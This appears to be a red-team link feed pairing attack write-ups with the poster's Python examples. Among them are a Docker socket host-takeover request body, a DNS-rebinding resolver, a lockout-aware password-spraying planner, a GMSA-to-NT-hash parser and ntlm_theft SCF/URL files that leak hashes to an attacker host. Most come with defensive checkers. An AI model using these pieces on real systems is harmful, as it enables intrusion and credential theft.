ExcreamOnSecurity
root@ExcreamOnSecurity: % cat ~/etc/topics.allow

- Offensive Security (Red Teaming / PenTesting)
- Blue Team (Operational Security, Threat Hunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
Roll your own Ngrok with Nginx, Letsencrypt, and SSH reverse tunnelling

Ngrok is a fantastic tool for creating a secure tunnel from the public web to a machine behind NAT or a firewall. Sadly, it costs money and it’s proprietary. If you’re a developer, odds are that you’re already renting a server in the public cloud, so why not roll your own ngrok?

https://jerrington.me/posts/2019-01-29-self-hosted-ngrok.html
#pivoting #pentest #redteam
THE DANGER OF EXPOSING DOCKER.SOCK. Exposing /var/run/docker.sock (for example by bind-mounting it into a container, or by serving the daemon API over TCP) could lead to full environment takeover: whoever can talk to the socket can ask the daemon to start a privileged container with the host filesystem mounted, which is root on the host.

https://dejandayoff.com/the-danger-of-exposing-docker.sock/

#docker #pentest
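An added example to go with the post (my own code, not from the linked article): audit `docker inspect` output for containers that have the daemon socket mounted or run privileged, check the socket's permission bits, and show the container-create body that turns socket access into host root. The inspect document and container names are constructed for the demo; `UnixHTTPConnection` is a minimal http.client subclass, not a Docker SDK.

```python
import http.client
import json
import os
import socket
import stat

DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}

# Constructed sample: a trimmed `docker inspect web ci-agent`, invented for the demo.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/www",
                    "Destination": "/usr/share/nginx/html", "RW": False}],
    },
    {
        "Name": "/ci-agent",
        "HostConfig": {"Privileged": False},
        # Mounted read-only, which changes nothing: ro governs the filesystem node,
        # not connect()/write() on the socket, so the API is still fully usable.
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                    "Destination": "/var/run/docker.sock", "RW": False}],
    },
])


def find_socket_exposure(inspect_json):
    """(container, reason) for every container that controls the host through the
    daemon: a bind mount of the daemon socket, or --privileged."""
    findings = []
    for c in json.loads(inspect_json):
        name = c["Name"].lstrip("/")
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and m.get("Source") in DOCKER_SOCKETS:
                findings.append((name, "docker socket mounted at " + m["Destination"]))
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "privileged container"))
    return findings


def mode_issues(mode):
    """Issues with a socket's permission bits: anyone who can write to the daemon
    socket is root on the host, so group or world write bits matter."""
    issues = set()
    if mode & stat.S_IWGRP:
        issues.add("group-writable")   # usually group 'docker': membership == root
    if mode & stat.S_IWOTH:
        issues.add("world-writable")
    return issues


def socket_mode_issues(path="/var/run/docker.sock"):
    return mode_issues(os.stat(path).st_mode)


def host_takeover_spec(image="alpine"):
    """Body for POST /containers/create that mounts the host root filesystem.
    Anything that can reach the socket can send this; that is the takeover."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/host", "sh", "-c", "id"],
        "HostConfig": {"Binds": ["/:/host"], "Privileged": True},
    }


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over a Unix socket, enough to talk to the Engine API."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def daemon_version(path="/var/run/docker.sock"):
    """GET /version. If this answers from inside a container, the host is yours."""
    conn = UnixHTTPConnection(path)
    conn.request("GET", "/version")
    return json.loads(conn.getresponse().read())


if __name__ == "__main__":
    for name, reason in find_socket_exposure(SAMPLE_INSPECT):
        print(f"[!] {name}: {reason}")
    if os.path.exists("/var/run/docker.sock"):
        print("socket perms:", socket_mode_issues() or "root-only")
        print("daemon:", daemon_version().get("Version"))
```

Run it on a box as root (or a docker-group member) to see the audit and a real /version answer; run it inside a container that has the socket mounted and the same answer tells you that container owns the host. The `:ro` finding is the caveat worth remembering: a read-only mount of docker.sock is not a mitigation.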
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

https://github.com/nccgroup/singularity
#dns #pentest
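An added example (my own code, not Singularity's) of the two halves of a rebinding attack: an authoritative resolver that answers the attacker's IP first and the target's IP afterwards, and the resolver-side filter that defeats it. The hostname scheme parsed here, s-<attacker ip>-<target ip>-<session>-<fs|rr>.<zone>, is a simplified one of my own that only loosely mirrors how Singularity encodes its parameters in the name; the zone rebind.example and the addresses are invented.

```python
import ipaddress
import re

ZONE = "rebind.example"
NAME_RE = re.compile(
    r"^s-(?P<attacker>\d+\.\d+\.\d+\.\d+)-(?P<target>\d+\.\d+\.\d+\.\d+)"
    r"-(?P<session>[0-9a-f]+)-(?P<strategy>fs|rr)\." + re.escape(ZONE) + r"\.?$"
)


class RebindingResolver:
    """Authoritative server for ZONE. Each session answers with the attacker's IP
    first, so the browser loads the attack page from it, then with the target's
    IP, so the page's same-origin requests land on the victim service."""

    def __init__(self):
        self.queries = {}  # session id -> number of A queries seen

    def answer(self, qname):
        m = NAME_RE.match(qname.lower())
        if not m:
            return None  # not our zone
        n = self.queries.get(m["session"], 0)
        self.queries[m["session"]] = n + 1
        if m["strategy"] == "fs":      # first-then-second: flip once, stay flipped
            ip = m["attacker"] if n == 0 else m["target"]
        else:                          # round-robin: alternate on every query
            ip = m["attacker"] if n % 2 == 0 else m["target"]
        # TTL 0 asks the client not to cache. Browsers cache for a minimum time
        # anyway, which is why the attack page keeps polling until the flip lands.
        return {"name": qname, "type": "A", "ttl": 0, "data": ip}


def rebinds_to_private(answer, internal_zones=()):
    """Resolver-side defence: refuse A records for external names that point at
    loopback, link-local or RFC1918 space (what unbound's private-address and
    dnsmasq's --stop-dns-rebind enforce). Names under internal_zones may."""
    name = answer["name"].lower().rstrip(".")
    if any(name == z or name.endswith("." + z) for z in internal_zones):
        return False
    ip = ipaddress.ip_address(answer["data"])
    return ip.is_private or ip.is_loopback or ip.is_link_local


if __name__ == "__main__":
    r = RebindingResolver()
    q = "s-93.184.216.34-127.0.0.1-7f3c-fs." + ZONE
    for _ in range(3):
        a = r.answer(q)
        print(a["data"], "blocked" if rebinds_to_private(a) else "allowed")
```

The filter is the check a defender wants at the recursive resolver rather than in each application: the attacker controls the authoritative side, so nothing on that end can be trusted, but a public name suddenly resolving to 127.0.0.1 or 10/8 is always wrong unless the zone is one of yours.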
Password Spraying - Common mistakes and how to avoid them
When password spraying attacks are executed, coordinated and scoped properly during an authorized engagement, they can identify and illustrate the dangers of weak passwords and show how dangerous even a single legacy Internet-facing endpoint can be.

https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
#pentest #redteaming
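An added example (my own code, not from the article) of the lockout arithmetic that most spraying mistakes come down to. It models the Windows badPwdCount rule: the counter resets only once a full observation window has passed since the last failed attempt, so a naive "failures in the last N minutes" check underestimates the real count when attempts are spaced closer than the window. The lockout policy values and attempt history are constructed.

```python
from datetime import datetime, timedelta


class LockoutPolicy:
    def __init__(self, threshold, observation_window, safety_margin=1):
        self.threshold = threshold          # lockoutThreshold (0 = never lock out)
        self.window = observation_window    # lockoutObservationWindow
        self.safety_margin = safety_margin  # stay this many attempts below threshold


def estimated_bad_pwd_count(attempts, window, now):
    """Replay a user's failed-logon timestamps the way the DC does: the count
    climbs while consecutive failures are closer together than the window and
    drops back to zero once a gap of at least one window appears."""
    count, last = 0, None
    for t in sorted(attempts):
        if last is not None and t - last >= window:
            count = 0
        count += 1
        last = t
    if last is not None and now - last >= window:
        return 0
    return count


def can_attempt(attempts, policy, now):
    """True if one more failure right now still stays below threshold - margin."""
    if policy.threshold == 0:
        return True
    current = estimated_bad_pwd_count(attempts, policy.window, now)
    return current + 1 <= policy.threshold - policy.safety_margin


def plan_rounds(passwords, policy, start, round_duration=timedelta(0)):
    """Split candidate passwords into rounds of at most (threshold - margin)
    guesses per user. round_duration is how long one pass over the user list
    takes; the next round starts a full window after the previous one *ends*,
    so every user's counter has reset. Returns [(round_start, [passwords]), ...]."""
    if policy.threshold == 0:
        return [(start, list(passwords))]
    per_round = policy.threshold - policy.safety_margin
    if per_round < 1:
        raise ValueError("safety margin leaves no room for any attempt")
    spacing = policy.window + round_duration
    rounds = []
    for i in range(0, len(passwords), per_round):
        rounds.append((start + (i // per_round) * spacing,
                       list(passwords[i:i + per_round])))
    return rounds


if __name__ == "__main__":
    t0 = datetime(2019, 5, 1, 9, 0)
    policy = LockoutPolicy(threshold=5, observation_window=timedelta(minutes=30))
    # Constructed history: failures 20 minutes apart never let the counter reset.
    history = [t0, t0 + timedelta(minutes=20), t0 + timedelta(minutes=40)]
    now = t0 + timedelta(minutes=60)
    print("badPwdCount now:", estimated_bad_pwd_count(history, policy.window, now))
    print("safe to try one more:", can_attempt(history, policy, now))
    for when, pws in plan_rounds(["Spring2019!", "Summer2019!", "Welcome1",
                                  "Password1", "Company123"], policy, t0,
                                 round_duration=timedelta(minutes=10)):
        print(when.strftime("%H:%M"), pws)
```

Read the policy first (`net accounts /domain`, or the domain's lockoutThreshold and lockoutObservationWindow via LDAP) and feed the real values in; the planner is only as good as those numbers, and a fine-grained password policy can give some users a stricter threshold than the default domain policy.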
Next Gen Phishing – Leveraging Azure Information Protection
How to use Azure Information Protection (AIP) to improve phishing campaigns, from the perspective of an attacker.

https://www.trustedsec.com/2019/04/next-gen-phishing-leveraging-azure-information-protection/

#phishing #azure #pentest #redteam
Vulmap is an open source vulnerability scanner that runs locally on a Windows or Linux host, inventories the installed software and checks it against an online vulnerability database (Vulmon's). The scripts can be used for defensive and offensive purposes: for vulnerability assessments, and by pentesters/red teamers looking for privilege escalation candidates on a host they already have a shell on.

https://github.com/vulmon/Vulmap

#scanning #pentest
Osmedeus - Fully automated offensive security tool for reconnaissance and vulnerability scanning. Osmedeus lets you run a curated collection of reconnaissance and vulnerability-scanning tools against a target automatically.

https://github.com/j3ssie/Osmedeus
#recon #bugbounty #pentest
Kerberos cheatsheet
A cheatsheet with commands that can be used to perform kerberos attacks:

- Bruteforcing
- ASREPRoast
- Kerberoasting
- Overpass The Hash/Pass The Key (PTK)
- Pass The Ticket (PTT)
- Silver / Golden ticket

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
#pentest #redteaming #kerberos #windows #ad
Check-LocalAdminHash
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code.

https://github.com/dafthack/Check-LocalAdminHash
#redteaming #pentest #ad #windows
Docker for Pentesters

My hope in this post is to demonstrate some of my use cases and workflows, and illustrate how I think pentesters and security professionals in general can greatly benefit from Docker.

https://blog.ropnop.com/docker-for-pentesters/

#docker #pentest
Extracting credentials from a remote Windows system - Living off the Land

Recently we performed a red teaming engagement where we wanted to dump the credentials from a remote host. We got the credentials of a user which has administrative privileges on the victim host and wanted to get more credentials from that host. Because we felt that the blue team was closely observing the environment this needed to be done in a stealthy manner and preferably only involving native Windows tooling. That is when we came up with the following approach in order to obtain a remote system’s SYSTEM, SECURITY and SAM files from %SystemRoot%\System32\Config making use of WMI and SMB. This approach can also be used to obtain the ntds.dit file from a Domain Controller in order to obtain the credentials of the complete organization.

https://bitsadm.in/blog/extracting-credentials-from-remote-windows-system
#windows #redteaming #pentest #evasion
Attacking Active Directory Group Managed Service Accounts (GMSAs)

User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. This means that security principals have to be explicitly delegated access to the clear-text password (the GMSA's PrincipalsAllowedToRetrieveManagedPassword list); compromise any one of those principals and the GMSA's password comes with it. This is where it can get tricky.

https://adsecurity.org/?p=4367
#ad #windows #pentest
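An added example (my own code, not from the adsecurity.org post) of the step after you hold one of the allowed principals: the msDS-ManagedPassword attribute you read over LDAP is an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS), and this parses it. Since there is no domain controller to query offline, build_managed_password_blob constructs a blob in the documented layout for the demo; the passwords and intervals in it are invented. The real current password is 120 random UTF-16 characters, which is why you would use its NT hash rather than type it.

```python
import hashlib
import struct

# Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
# QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset (little-endian,
# offsets are from the start of the blob)
HEADER = struct.Struct("<HHIHHHH")
HUNDRED_NS_PER_SECOND = 10_000_000   # intervals are FILETIME-style durations


def _utf16z_bytes(buf, off):
    """Raw bytes of the NUL-terminated UTF-16LE string starting at off."""
    end = off
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(buf):
        raise ValueError("unterminated UTF-16 string in blob")
    return buf[off:end]


def parse_managed_password_blob(blob):
    version, reserved, length, cur_off, prev_off, qpi_off, upi_off = HEADER.unpack_from(blob, 0)
    if version != 1 or reserved != 0:
        raise ValueError("unexpected MSDS-MANAGEDPASSWORD_BLOB version/reserved")
    if length != len(blob):
        raise ValueError("blob Length field does not match data")
    current = _utf16z_bytes(blob, cur_off)
    # PreviousPasswordOffset is 0 until the password has rolled over at least once
    previous = _utf16z_bytes(blob, prev_off) if prev_off else None
    query_interval, = struct.unpack_from("<Q", blob, qpi_off)
    unchanged_interval, = struct.unpack_from("<Q", blob, upi_off)
    return {
        "current_password_raw": current,
        # surrogatepass: a random password may contain unpaired surrogates
        "current_password": current.decode("utf-16-le", "surrogatepass"),
        "previous_password": previous.decode("utf-16-le", "surrogatepass") if previous else None,
        "query_password_interval_s": query_interval // HUNDRED_NS_PER_SECOND,
        "unchanged_password_interval_s": unchanged_interval // HUNDRED_NS_PER_SECOND,
    }


def nt_hash(password_utf16le):
    """NT hash = MD4 over the UTF-16LE password bytes, i.e. the pass-the-hash
    material. Returns None when the OpenSSL behind hashlib has no MD4."""
    try:
        return hashlib.new("md4", password_utf16le).hexdigest()
    except ValueError:
        return None


def build_managed_password_blob(current, previous=None, query_interval_s=0, unchanged_interval_s=0):
    """Construct a blob in the documented layout (demo input only; AD makes the real one)."""
    data = bytearray(HEADER.size)

    def put_string(s):
        off = len(data)
        data.extend(s.encode("utf-16-le") + b"\x00\x00")
        while len(data) % 8:          # AlignmentPadding
            data.append(0)
        return off

    cur_off = put_string(current)
    prev_off = put_string(previous) if previous is not None else 0
    qpi_off = len(data)
    data.extend(struct.pack("<Q", query_interval_s * HUNDRED_NS_PER_SECOND))
    upi_off = len(data)
    data.extend(struct.pack("<Q", unchanged_interval_s * HUNDRED_NS_PER_SECOND))
    HEADER.pack_into(data, 0, 1, 0, len(data), cur_off, prev_off, qpi_off, upi_off)
    return bytes(data)


if __name__ == "__main__":
    blob = build_managed_password_blob("Curr3nt-Pw", "Prev10us-Pw",
                                       query_interval_s=30 * 86400,
                                       unchanged_interval_s=30 * 86400 - 300)
    parsed = parse_managed_password_blob(blob)
    print({k: v for k, v in parsed.items() if k != "current_password_raw"})
    print("NT hash:", nt_hash(parsed["current_password_raw"]))
```

In practice the attribute only comes back over a confidentiality-protected LDAP bind (LDAPS or sign-and-seal) from a principal on the allowed list; the unchanged interval tells you how long the hash you just derived stays valid before AD rolls the password.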
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. The process outlined here affects Windows machines from 2008R2/Windows 7 through 2019/Windows 10.

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
#windows #persistence #redteaming #pentest
ntlm_theft: A file payload generator for forced ntlm hash disclosure

Greetings fellow security enthusiast! Today I want to introduce you to a new security tool I’ve written called ntlm_theft, which is now available on GitHub. It’s a tool which generates a number of known filetypes (18 at time of writing), which can be used by an attacker to trick users into disclosing their NetNTLMv2 hashes.

> https://medium.com/greenwolf-security/ntlm-theft-a-file-payload-generator-for-forced-ntlm-hash-disclosure-2d5f1fe5b964
> https://github.com/Greenwolf/ntlm_theft

#windows #ntlm #tools #pentest
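An added example (my own code, not ntlm_theft's) of two of the text-based payload types such a tool emits, plus a scanner for the same trick from the blue side. Both formats point an icon at a UNC path; when Explorer renders the folder it authenticates to the SMB server at that host, handing over a NetNTLMv2 response for the logged-on user. The attacker host 10.0.0.13, the share name and the demo directory are invented; the SCF and .url layouts are the standard ones.

```python
import ipaddress
import re
from pathlib import Path

UNC_RE = re.compile(r"\\\\(?P<host>[^\\\s]+)\\(?P<share>[^\\\s]+)")
TEXT_TYPES = {".scf", ".url", ".rtf", ".htm", ".html", ".library-ms", ".xml"}


def scf_payload(attacker_host, share="share", icon="icon.ico"):
    """Shell Command File: Explorer fetches IconFile just by listing the folder."""
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile=\\\\{attacker_host}\\{share}\\{icon}\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


def url_payload(attacker_host, share="share", icon="icon.ico", url="http://example.com"):
    """Internet shortcut whose icon is loaded from the attacker's share."""
    return (
        "[InternetShortcut]\r\n"
        f"URL={url}\r\n"
        "IconIndex=1\r\n"
        f"IconFile=\\\\{attacker_host}\\{share}\\{icon}\r\n"
    )


def write_payloads(directory, attacker_host):
    """Drop both files; the leading '@' sorts them first so Explorer renders them early."""
    directory = Path(directory)
    directory.mkdir(parents=True, exist_ok=True)
    (directory / "@readme.scf").write_text(scf_payload(attacker_host), encoding="ascii")
    (directory / "@readme.url").write_text(url_payload(attacker_host), encoding="ascii")
    return sorted(p.name for p in directory.iterdir())


def unc_hosts(text):
    """Every UNC host referenced in a text file, deduplicated."""
    return sorted({m["host"] for m in UNC_RE.finditer(text)})


def is_trusted_host(host, trusted_suffixes=(), trusted_networks=()):
    """A UNC target is fine if it is one of our file servers; a bare external IP
    or an unknown name is the forced-authentication pattern."""
    h = host.lower()
    if any(h == s or h.endswith("." + s) for s in trusted_suffixes):
        return True
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return False
    return any(ip in ipaddress.ip_network(n) for n in trusted_networks)


def scan_for_forced_auth(directory, trusted_suffixes=(), trusted_networks=()):
    """Walk a share and report text files whose UNC references point outside the
    trusted set, as (filename, [hosts])."""
    hits = []
    for p in sorted(Path(directory).rglob("*")):
        if not p.is_file() or p.suffix.lower() not in TEXT_TYPES:
            continue
        text = p.read_text(errors="ignore")
        bad = [h for h in unc_hosts(text)
               if not is_trusted_host(h, trusted_suffixes, trusted_networks)]
        if bad:
            hits.append((p.name, bad))
    return hits


if __name__ == "__main__":
    print(write_payloads("ntlm_theft_demo", "10.0.0.13"))
    print(scan_for_forced_auth("ntlm_theft_demo",
                               trusted_suffixes=("corp.example",),
                               trusted_networks=("10.10.0.0/16",)))
```

The scanner only covers text formats; .lnk and Office documents carry the same UNC reference but need a binary or OOXML parser. The network-side control is the one that actually stops the credential leaving: block outbound SMB (445/tcp) at the perimeter and the icon fetch to an Internet host never authenticates.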